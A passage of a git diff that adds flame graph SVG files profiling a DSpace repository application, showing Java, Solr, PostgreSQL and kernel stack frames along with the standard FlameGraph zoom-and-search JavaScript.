+<text  x="1147.86" y="975.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.18%)</title><rect x="421.6" y="885" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::query (5 samples, 0.46%)</title><rect x="830.0" y="949" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="832.98" y="959.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.18%)</title><rect x="720.4" y="869" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="723.36" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%)</title><rect x="736.5" y="789" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="739.48" y="799.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (3 samples, 0.27%)</title><rect x="569.9" y="933" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="572.91" y="943.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.18%)</title><rect x="855.8" y="757" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="858.77" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (5 samples, 0.46%)</title><rect x="1136.3" y="949" width="5.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1139.27" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/ContentStreamUpdateRequest:::getContentStreams (1 samples, 0.09%)</title><rect x="560.2" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="563.24" y="959.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/annotation/RequiredAnnotationBeanPostProcessor:::postProcessPropertyValues (1 samples, 0.09%)</title><rect x="898.8" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="901.76" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (9 samples, 0.82%)</title><rect x="1020.2" y="933" width="9.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1023.20" y="943.5" ></text>
+</g>
+<g >
+<title>__sk_dst_check (1 samples, 0.09%)</title><rect x="201.3" y="1077" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="204.29" y="1087.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%)</title><rect x="1170.7" y="917" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1173.66" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="735.4" y="869" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.41" y="879.5" ></text>
+</g>
+<g >
+<title>tcp_send_mss (4 samples, 0.36%)</title><rect x="357.1" y="1173" width="4.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="360.12" y="1183.5" ></text>
+</g>
+<g >
+<title>acpi_ev_sci_xrupt_handler (1 samples, 0.09%)</title><rect x="421.6" y="597" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="607.5" ></text>
+</g>
+<g >
+<title>rb_first (1 samples, 0.09%)</title><rect x="353.9" y="1109" width="1.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="356.90" y="1119.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (1 samples, 0.09%)</title><rect x="739.7" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="742.71" y="927.5" ></text>
+</g>
+<g >
+<title>Interpreter (747 samples, 68.03%)</title><rect x="372.2" y="1029" width="802.8" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="375.17" y="1039.5" >Interpreter</text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="1033.1" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1036.10" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="745.1" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="748.08" y="927.5" ></text>
+</g>
+<g >
+<title>__inet_stream_connect (1 samples, 0.09%)</title><rect x="1078.2" y="661" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1081.23" y="671.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (5 samples, 0.46%)</title><rect x="1154.5" y="981" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1157.54" y="991.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="801.0" y="933" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="803.97" y="943.5" ></text>
+</g>
+<g >
+<title>handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="132.5" y="1061" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="135.51" y="1071.5" ></text>
+</g>
+<g >
+<title>memcg_kmem_put_cache (1 samples, 0.09%)</title><rect x="178.7" y="1125" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="181.72" y="1135.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="1157.8" y="837" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1160.76" y="847.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range_clock (3 samples, 0.27%)</title><rect x="1109.4" y="757" width="3.2" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1112.40" y="767.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractCollection:::addAll (1 samples, 0.09%)</title><rect x="633.3" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="636.32" y="895.5" ></text>
+</g>
+<g >
+<title>dequeue_task_fair (1 samples, 0.09%)</title><rect x="114.2" y="1109" width="1.1" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="117.24" y="1119.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="866.5" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="869.52" y="943.5" ></text>
+</g>
+<g >
+<title>sched_clock (1 samples, 0.09%)</title><rect x="964.3" y="693" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="967.32" y="703.5" ></text>
+</g>
+<g >
+<title>bbr_main (4 samples, 0.36%)</title><rect x="277.6" y="725" width="4.3" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="280.60" y="735.5" ></text>
+</g>
+<g >
+<title>__entry_text_start (5 samples, 0.46%)</title><rect x="142.2" y="1301" width="5.4" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="145.19" y="1311.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Class_forName0 (2 samples, 0.18%)</title><rect x="723.6" y="901" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="726.59" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1017.0" y="901" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1019.98" y="911.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (6 samples, 0.55%)</title><rect x="414.1" y="821" width="6.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="417.08" y="831.5" ></text>
+</g>
+<g >
+<title>ip_output (1 samples, 0.09%)</title><rect x="1078.2" y="533" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="543.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="853" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="863.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (3 samples, 0.27%)</title><rect x="1148.1" y="949" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1151.09" y="959.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::writeBytes (3 samples, 0.27%)</title><rect x="1137.3" y="917" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1140.34" y="927.5" ></text>
+</g>
+<g >
+<title>perf_swevent_add (1 samples, 0.09%)</title><rect x="1111.5" y="581" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1114.55" y="591.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (5 samples, 0.46%)</title><rect x="548.4" y="597" width="5.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="551.42" y="607.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="1083.6" y="869" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1086.61" y="879.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::writeDocument (175 samples, 15.94%)</title><rect x="379.7" y="965" width="188.1" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="382.69" y="975.5" >com/atmire/dspace/discov..</text>
+</g>
+<g >
+<title>kfree_skbmem (1 samples, 0.09%)</title><rect x="284.0" y="693" width="1.1" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="287.04" y="703.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::group0 (6 samples, 0.55%)</title><rect x="925.6" y="789" width="6.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="928.63" y="799.5" ></text>
+</g>
+<g >
+<title>java/lang/ref/Finalizer:::register (1 samples, 0.09%)</title><rect x="755.8" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="758.83" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/BasicHeaderValueParser:::parseNameValuePair (1 samples, 0.09%)</title><rect x="1077.2" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1080.16" y="911.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (1 samples, 0.09%)</title><rect x="1121.2" y="613" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1124.22" y="623.5" ></text>
+</g>
+<g >
+<title>end_bio_bh_io_sync (1 samples, 0.09%)</title><rect x="137.9" y="853" width="1.1" height="15.0" fill="rgb(250,122,122)" rx="2" ry="2" />
+<text  x="140.89" y="863.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::split (2 samples, 0.18%)</title><rect x="578.5" y="949" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="581.51" y="959.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (95 samples, 8.65%)</title><rect x="621.5" y="949" width="102.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="624.49" y="959.5" >org/dspace/s..</text>
+</g>
+<g >
+<title>org/springframework/beans/propertyeditors/CustomMapEditor:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="625.8" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="628.79" y="911.5" ></text>
+</g>
+<g >
+<title>visit_groups_merge (1 samples, 0.09%)</title><rect x="1111.5" y="645" width="1.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="1114.55" y="655.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::Receive (1 samples, 0.09%)</title><rect x="1158.8" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.83" y="847.5" ></text>
+</g>
+<g >
+<title>nft_ct_get_eval (1 samples, 0.09%)</title><rect x="294.8" y="789" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="297.79" y="799.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="751.5" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="754.53" y="943.5" ></text>
+</g>
+<g >
+<title>acpi_ev_gpe_detect (1 samples, 0.09%)</title><rect x="132.5" y="997" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="1007.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (3 samples, 0.27%)</title><rect x="1137.3" y="933" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1140.34" y="943.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (12 samples, 1.09%)</title><rect x="117.5" y="1029" width="12.9" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="120.47" y="1039.5" ></text>
+</g>
+<g >
+<title>ext4_getblk (1 samples, 0.09%)</title><rect x="11.1" y="1077" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="14.07" y="1087.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList$SubList$1:::hasNext (1 samples, 0.09%)</title><rect x="913.8" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="916.81" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.09%)</title><rect x="1125.5" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1128.52" y="959.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (1 samples, 0.09%)</title><rect x="436.6" y="645" width="1.1" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="439.65" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="810.6" y="853" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="813.64" y="863.5" ></text>
+</g>
+<g >
+<title>strncpy (3 samples, 0.27%)</title><rect x="327.0" y="805" width="3.3" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="330.03" y="815.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.27%)</title><rect x="735.4" y="821" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.41" y="831.5" ></text>
+</g>
+<g >
+<title>skb_release_all (1 samples, 0.09%)</title><rect x="285.1" y="693" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="288.12" y="703.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (5 samples, 0.46%)</title><rect x="853.6" y="789" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="856.62" y="799.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="1027.7" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1030.72" y="831.5" ></text>
+</g>
+<g >
+<title>memcmp (1 samples, 0.09%)</title><rect x="323.8" y="805" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="326.81" y="815.5" ></text>
+</g>
+<g >
+<title>file_update_time (2 samples, 0.18%)</title><rect x="409.8" y="613" width="2.1" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="412.78" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (27 samples, 2.46%)</title><rect x="531.2" y="933" width="29.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="534.22" y="943.5" >or..</text>
+</g>
+<g >
+<title>org/dspace/discovery/SearchUtils:::getAllDiscoveryConfigurations (7 samples, 0.64%)</title><rect x="875.1" y="965" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="878.12" y="975.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseEntity (3 samples, 0.27%)</title><rect x="1084.7" y="901" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1087.68" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="1157.8" y="949" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.76" y="959.5" ></text>
+</g>
+<g >
+<title>rb_next (1 samples, 0.09%)</title><rect x="709.6" y="773" width="1.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="712.62" y="783.5" ></text>
+</g>
+<g >
+<title>__x64_sys_shutdown (1 samples, 0.09%)</title><rect x="1121.2" y="821" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1124.22" y="831.5" ></text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.09%)</title><rect x="790.2" y="789" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="799.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (27 samples, 2.46%)</title><rect x="635.5" y="869" width="29.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="638.46" y="879.5" >ja..</text>
+</g>
+<g >
+<title>update_rq_clock (1 samples, 0.09%)</title><rect x="964.3" y="709" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="967.32" y="719.5" ></text>
+</g>
+<g >
+<title>wait_woken (31 samples, 2.82%)</title><rect x="99.2" y="1173" width="33.3" height="15.0" fill="rgb(219,79,79)" rx="2" ry="2" />
+<text  x="102.20" y="1183.5" >wa..</text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.09%)</title><rect x="1153.5" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1156.46" y="927.5" ></text>
+</g>
+<g >
+<title>sched_clock (1 samples, 0.09%)</title><rect x="229.2" y="917" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="232.23" y="927.5" ></text>
+</g>
+<g >
+<title>handle_fasteoi_irq (1 samples, 0.09%)</title><rect x="132.5" y="1093" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="135.51" y="1103.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (36 samples, 3.28%)</title><rect x="896.6" y="901" width="38.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="899.61" y="911.5" >org..</text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.18%)</title><rect x="1157.8" y="901" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.76" y="911.5" ></text>
+</g>
+<g >
+<title>JNU_ThrowByName (1 samples, 0.09%)</title><rect x="461.4" y="837" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="464.37" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/methods/HttpPost:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="466.7" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="469.74" y="927.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.09%)</title><rect x="1039.5" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1042.54" y="863.5" ></text>
+</g>
+<g >
+<title>JVM_GetStackTraceElement (5 samples, 0.46%)</title><rect x="415.2" y="789" width="5.3" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="418.15" y="799.5" ></text>
+</g>
+<g >
+<title>ext4_bread_batch (1 samples, 0.09%)</title><rect x="11.1" y="1093" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="14.07" y="1103.5" ></text>
+</g>
+</g>
+</svg>
diff --git a/docs/2020/02/out.dspace64-3.svg b/docs/2020/02/out.dspace64-3.svg
new file mode 100644
index 000000000..16d38c48a
--- /dev/null
+++ b/docs/2020/02/out.dspace64-3.svg
@@ -0,0 +1,4996 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" width="1200" height="950" onload="init(evt)" viewBox="0 0 1200 950" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<!-- Flame graph stack visualization. See https://github.com/brendangregg/FlameGraph for latest version, and http://www.brendangregg.com/flamegraphs.html for examples. -->
+<!-- NOTES:  -->
+<defs>
+	<linearGradient id="background" y1="0" y2="1" x1="0" x2="0" >
+		<stop stop-color="#eeeeee" offset="5%" />
+		<stop stop-color="#eeeeb0" offset="95%" />
+	</linearGradient>
+</defs>
+<style type="text/css">
+	text { font-family:Verdana; font-size:12px; fill:rgb(0,0,0); }
+	#search, #ignorecase { opacity:0.1; cursor:pointer; }
+	#search:hover, #search.show, #ignorecase:hover, #ignorecase.show { opacity:1; }
+	#subtitle { text-anchor:middle; font-color:rgb(160,160,160); }
+	#title { text-anchor:middle; font-size:17px}
+	#unzoom { cursor:pointer; }
+	#frames > *:hover { stroke:black; stroke-width:0.5; cursor:pointer; }
+	.hide { display:none; }
+	.parent { opacity:0.5; }
+</style>
+<script type="text/ecmascript">
+<![CDATA[
+	"use strict";
+	var details, searchbtn, unzoombtn, matchedtxt, svg, searching, currentSearchTerm, ignorecase, ignorecaseBtn;
+	function init(evt) {
+		details = document.getElementById("details").firstChild;
+		searchbtn = document.getElementById("search");
+		ignorecaseBtn = document.getElementById("ignorecase");
+		unzoombtn = document.getElementById("unzoom");
+		matchedtxt = document.getElementById("matched");
+		svg = document.getElementsByTagName("svg")[0];
+		searching = 0;
+		currentSearchTerm = null;
+	}
+
+	window.addEventListener("click", function(e) {
+		var target = find_group(e.target);
+		if (target) {
+			if (target.nodeName == "a") {
+				if (e.ctrlKey === false) return;
+				e.preventDefault();
+			}
+			if (target.classList.contains("parent")) unzoom();
+			zoom(target);
+		}
+		else if (e.target.id == "unzoom") unzoom();
+		else if (e.target.id == "search") search_prompt();
+		else if (e.target.id == "ignorecase") toggle_ignorecase();
+	}, false)
+
+	// mouse-over for info
+	// show
+	window.addEventListener("mouseover", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = "Function: " + g_to_text(target);
+	}, false)
+
+	// clear
+	window.addEventListener("mouseout", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = ' ';
+	}, false)
+
+	// ctrl-F for search
+	window.addEventListener("keydown",function (e) {
+		if (e.keyCode === 114 || (e.ctrlKey && e.keyCode === 70)) {
+			e.preventDefault();
+			search_prompt();
+		}
+	}, false)
+
+	// ctrl-I to toggle case-sensitive search
+	window.addEventListener("keydown",function (e) {
+		if (e.ctrlKey && e.keyCode === 73) {
+			e.preventDefault();
+			toggle_ignorecase();
+		}
+	}, false)
+
+	// functions
+	function find_child(node, selector) {
+		var children = node.querySelectorAll(selector);
+		if (children.length) return children[0];
+		return;
+	}
+	function find_group(node) {
+		var parent = node.parentElement;
+		if (!parent) return;
+		if (parent.id == "frames") return node;
+		return find_group(parent);
+	}
+	function orig_save(e, attr, val) {
+		if (e.attributes["_orig_" + attr] != undefined) return;
+		if (e.attributes[attr] == undefined) return;
+		if (val == undefined) val = e.attributes[attr].value;
+		e.setAttribute("_orig_" + attr, val);
+	}
+	function orig_load(e, attr) {
+		if (e.attributes["_orig_"+attr] == undefined) return;
+		e.attributes[attr].value = e.attributes["_orig_" + attr].value;
+		e.removeAttribute("_orig_"+attr);
+	}
+	function g_to_text(e) {
+		var text = find_child(e, "title").firstChild.nodeValue;
+		return (text)
+	}
+	function g_to_func(e) {
+		var func = g_to_text(e);
+		// if there's any manipulation we want to do to the function
+		// name before it's searched, do it here before returning.
+		return (func);
+	}
+	function update_text(e) {
+		var r = find_child(e, "rect");
+		var t = find_child(e, "text");
+		var w = parseFloat(r.attributes.width.value) -3;
+		var txt = find_child(e, "title").textContent.replace(/\([^(]*\)$/,"");
+		t.attributes.x.value = parseFloat(r.attributes.x.value) + 3;
+
+		// Smaller than this size won't fit anything
+		if (w < 2 * 12 * 0.59) {
+			t.textContent = "";
+			return;
+		}
+
+		t.textContent = txt;
+		// Fit in full text width
+		if (/^ *$/.test(txt) || t.getSubStringLength(0, txt.length) < w)
+			return;
+
+		for (var x = txt.length - 2; x > 0; x--) {
+			if (t.getSubStringLength(0, x + 2) <= w) {
+				t.textContent = txt.substring(0, x) + "..";
+				return;
+			}
+		}
+		t.textContent = "";
+	}
+
+	// zoom
+	function zoom_reset(e) {
+		if (e.attributes != undefined) {
+			orig_load(e, "x");
+			orig_load(e, "width");
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_reset(c[i]);
+		}
+	}
+	function zoom_child(e, x, ratio) {
+		if (e.attributes != undefined) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = (parseFloat(e.attributes.x.value) - x - 10) * ratio + 10;
+				if (e.tagName == "text")
+					e.attributes.x.value = find_child(e.parentNode, "rect[x]").attributes.x.value + 3;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseFloat(e.attributes.width.value) * ratio;
+			}
+		}
+
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_child(c[i], x - 10, ratio);
+		}
+	}
+	function zoom_parent(e) {
+		if (e.attributes) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = 10;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseInt(svg.width.baseVal.value) - (10 * 2);
+			}
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_parent(c[i]);
+		}
+	}
+	function zoom(node) {
+		var attr = find_child(node, "rect").attributes;
+		var width = parseFloat(attr.width.value);
+		var xmin = parseFloat(attr.x.value);
+		var xmax = parseFloat(xmin + width);
+		var ymin = parseFloat(attr.y.value);
+		var ratio = (svg.width.baseVal.value - 2 * 10) / width;
+
+		// XXX: Workaround for JavaScript float issues (fix me)
+		var fudge = 0.0001;
+
+		unzoombtn.classList.remove("hide");
+
+		var el = document.getElementById("frames").children;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var a = find_child(e, "rect").attributes;
+			var ex = parseFloat(a.x.value);
+			var ew = parseFloat(a.width.value);
+			var upstack;
+			// Is it an ancestor
+			if (0 == 0) {
+				upstack = parseFloat(a.y.value) > ymin;
+			} else {
+				upstack = parseFloat(a.y.value) < ymin;
+			}
+			if (upstack) {
+				// Direct ancestor
+				if (ex <= xmin && (ex+ew+fudge) >= xmax) {
+					e.classList.add("parent");
+					zoom_parent(e);
+					update_text(e);
+				}
+				// not in current path
+				else
+					e.classList.add("hide");
+			}
+			// Children maybe
+			else {
+				// no common path
+				if (ex < xmin || ex + fudge >= xmax) {
+					e.classList.add("hide");
+				}
+				else {
+					zoom_child(e, xmin, ratio);
+					update_text(e);
+				}
+			}
+		}
+		search();
+	}
+	function unzoom() {
+		unzoombtn.classList.add("hide");
+		var el = document.getElementById("frames").children;
+		for(var i = 0; i < el.length; i++) {
+			el[i].classList.remove("parent");
+			el[i].classList.remove("hide");
+			zoom_reset(el[i]);
+			update_text(el[i]);
+		}
+		search();
+	}
+
+	// search
+	function toggle_ignorecase() {
+		ignorecase = !ignorecase;
+		if (ignorecase) {
+			ignorecaseBtn.classList.add("show");
+		} else {
+			ignorecaseBtn.classList.remove("show");
+		}
+		reset_search();
+		search();
+	}
+	function reset_search() {
